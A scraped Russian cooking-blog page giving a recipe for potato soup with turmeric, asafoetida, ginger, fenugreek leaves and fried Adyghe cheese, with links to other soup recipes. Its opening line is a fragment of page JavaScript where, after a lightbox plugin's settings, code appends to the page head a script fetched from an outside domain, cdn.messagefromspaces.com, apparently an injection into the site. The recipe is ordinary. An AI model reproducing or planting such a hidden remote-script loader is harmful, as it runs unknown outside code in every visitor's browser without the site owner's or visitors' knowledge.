, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Супчик картофельный со специями


kart_supУдивительно,  как с помощью специй, можно преобразить воду с картофелем, морковкой и сыром в ароматный, сытный и необычный суп!

Что и сколько берем:

1. Вода — 1 л

2. Картофель — 3/4 шт

3. Морковь — 1 шт

4. Сыр Адыгейский — 200 гр

5. Помидоры — 2 шт

6. Кориандр — 1ч.л

7. Асафетида — 1/2 ч.л

8. Имбирь — небольшой кусочек

9. Листья шамбалы — 1 ч.л

10. Куркума — 1 ч.л

11. Зелень по вкусу

12. Перец болгарский — 1/2

Начинаем готовить:

Картофель нарезаем кубиками и кладем в кипящую воду. Добавляем куркуму и варим минут 10. На сковороде в масле ГХИ (топленое масло) обжариваем  специи: кориандр, асафетиду и мелко натертый имбирь. Буквально через 30 сек выкладываем специи в суп и далее обжариваем морковь, болгарский перец  и помидоры (без шкурки!). Через минутку и это все кладем в суп. Затем жарим кубики адыгейского сыра и когда он приобретет золотистый цвет, отправляем его все в тот же  суп. Добавляем листья шамбалы и варим еще 1-2 минутки. Выключаем и даем настояться минут 30. Перед подачей на стол можно добавить любой зелени. Очень вкусно! Кстати, если кто-то любит поострей, смело прибавьте имбиря и положите перчик чили.

На эту тему вы можете почитать:

Суп Вишуаз (Vichyssoise)
Щи из савойской капусты с хренком
Фасолевый суп

Тэги: , ,



Добавить комментарий